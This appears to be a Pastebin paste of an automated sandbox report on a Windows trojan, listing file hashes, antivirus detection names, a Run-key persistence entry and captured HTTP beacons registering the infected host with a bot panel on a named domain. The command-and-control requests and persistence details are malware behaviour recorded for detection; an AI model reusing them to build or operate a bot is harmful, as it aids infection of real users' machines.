Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: ""
- * MalScore: 10.0
- * File Name: "Exes_c5198534efe6f0263e6b3f7ffa413884.exe"
- * File Size: 1175040
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "95d85c385d1870d5f28f5a68ef6e02ad869ba9b07ecdffb2cfeddfc47ef1bce1"
- * MD5: "c5198534efe6f0263e6b3f7ffa413884"
- * SHA1: "826f130678567b8946174d099735d20b4bbd830e"
- * SHA512: "a19090b472e2d5e358e2b9450638a6ae80e1eaa1be66a0f6ebddb6df05c87cfccc087434bcb2d29c6eb01976ca943ff10db5ce35c8ccf396e024c450ef7029b6"
- * CRC32: "3FD7EC9F"
- * SSDEEP: "24576:bA9baas9cJJCCRiYB8eu7Wm8u8rjW78ITnqeFU9GaEKpeRwifPco5O6yPi:bALs9cJJC6i/N7d8/+XFUcNwifPzW"
- * Process Execution:
- "Exes_c5198534efe6f0263e6b3f7ffa413884.exe"
- * Executed Commands:
- * Signatures Detected:
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
- "Details":
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://shopstoregame.com/adminpanel/mycount.txt"
- "url": "http://shopstoregame.com/adminpanel/add_bot.php?os=Windows+7+Enterprise+N+(Build%3A+7601+-+Service+Pack%3A+1.0)+(x64)&bits=x64&av=Not+found"
- "Description": "Installs itself for autorun at Windows startup",
- "Details":
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\VideoTek"
- "data": "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_c5198534efe6f0263e6b3f7ffa413884.exe"
- "Description": "File has been identified by 40 Antiviruses on VirusTotal as malicious",
- "Details":
- "MicroWorld-eScan": "Trojan.GenericKDZ.57291"
- "FireEye": "Generic.mg.c5198534efe6f026"
- "McAfee": "Trojan-FRGX!C5198534EFE6"
- "CrowdStrike": "win/malicious_confidence_80% (D)"
- "K7GW": "Trojan ( 005546901 )"
- "K7AntiVirus": "Trojan ( 005546901 )"
- "Arcabit": "Trojan.Generic.DDFCB"
- "Symantec": "ML.Attribute.HighConfidence"
- "APEX": "Malicious"
- "Paloalto": "generic.ml"
- "BitDefender": "Trojan.GenericKDZ.57291"
- "ViRobot": "Trojan.Win32.Z.Agent.1175040"
- "Avast": "Win32:Trojan-gen"
- "Endgame": "malicious (high confidence)"
- "Emsisoft": "Trojan.GenericKDZ.57291 (B)"
- "F-Secure": "Trojan.TR/Crypt.Agent.cvspg"
- "DrWeb": "Trojan.MulDrop4.25343"
- "Invincea": "heuristic"
- "McAfee-GW-Edition": "BehavesLike.Win32.PWSZbot.th"
- "Sophos": "Mal/Generic-S"
- "Cyren": "W32/Trojan.PKRL-1204"
- "Webroot": "W32.Trojan.Gen"
- "Avira": "TR/Crypt.Agent.cvspg"
- "MAX": "malware (ai score=83)"
- "Microsoft": "Trojan:Win32/Tiggre!plock"
- "AegisLab": "Trojan.Win32.Generic.4!c"
- "GData": "Trojan.GenericKDZ.57291"
- "AhnLab-V3": "Trojan/Win32.MalPe.R284465"
- "VBA32": "BScope.Trojan.Conteban"
- "ALYac": "Trojan.GenericKDZ.57291"
- "Ad-Aware": "Trojan.GenericKDZ.57291"
- "Malwarebytes": "Trojan.MalPack.GS.Generic"
- "ESET-NOD32": "a variant of Win32/Kryptik.GVDK"
- "TrendMicro-HouseCall": "TROJ_GEN.R002H09H119"
- "Rising": "[email protected] (RDML:ykPX3k/AtvzO7jg3o6QbAA)"
- "SentinelOne": "DFI - Malicious PE"
- "eGambit": "Unsafe.AI_Score_84%"
- "Fortinet": "W32/GenKryptik.GUZG!tr"
- "AVG": "Win32:Trojan-gen"
- "Qihoo-360": "HEUR/QVM10.2.EC2D.Malware.Gen"
- * Started Service:
- * Mutexes:
- * Modified Files:
- * Deleted Files:
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\VideoTek"
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "shopstoregame.com",
- "answers":
- "data": "194.58.61.184",
- "type": "A"
- * Domains:
- "ip": "194.58.61.184",
- "domain": "shopstoregame.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "",
- "uri": "http://shopstoregame.com/adminpanel/mycount.txt",
- "user-agent": "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14",
- "method": "GET",
- "host": "shopstoregame.com",
- "version": "1.1",
- "path": "/adminpanel/mycount.txt",
- "data": "GET /adminpanel/mycount.txt HTTP/1.1\r\nHost: shopstoregame.com\r\nConnection: keep-alive\r\nUser-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\r\nAccept: */*\r\n\r\n",
- "port": 80
- "count": 29,
- "body": "",
- "uri": "http://shopstoregame.com/adminpanel/add_bot.php?os=Windows+7+Enterprise+N+(Build%3A+7601+-+Service+Pack%3A+1.0)+(x64)&bits=x64&av=Not+found",
- "user-agent": "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14",
- "method": "GET",
- "host": "shopstoregame.com",
- "version": "1.1",
- "path": "/adminpanel/add_bot.php?os=Windows+7+Enterprise+N+(Build%3A+7601+-+Service+Pack%3A+1.0)+(x64)&bits=x64&av=Not+found",
- "data": "GET /adminpanel/add_bot.php?os=Windows+7+Enterprise+N+(Build%3A+7601+-+Service+Pack%3A+1.0)+(x64)&bits=x64&av=Not+found HTTP/1.1\r\nHost: shopstoregame.com\r\nConnection: keep-alive\r\nUser-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\r\nAccept: */*\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment